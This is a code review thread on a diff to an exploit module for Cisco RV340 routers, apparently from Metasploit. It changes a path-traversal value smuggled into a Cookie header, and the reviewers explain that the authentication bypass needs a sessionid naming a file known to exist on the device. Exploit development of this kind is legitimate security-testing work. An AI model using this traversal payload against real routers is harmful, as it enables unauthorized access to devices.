modules/exploits/linux/http/cisco_rv340_lan.rb

```diff
@@ -142,12 +152,13 @@ def send_exploit(cmd)
     multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
     multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))
 
+    # Escaping "/tmp/upload/" folder that does not contain any other permanent files
     send_request_cgi({
       'method' => 'POST',
       'uri' => '/upload',
       'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
       'headers' => {
-        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=' + sessionid
+        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
```

Comment:
Sorry I should have been clearer here, I'm pretty sure this can just be randomized?

Reply:
Cannot randomize.  The vulnerable code, which allows bypassing authentication, can be exploited by inserting a known file into the sessionid header. If this file is present on the system, the session check will pass.

Reply:
Sounds good, this is acceptable given these circumstances. Marking this as resolved.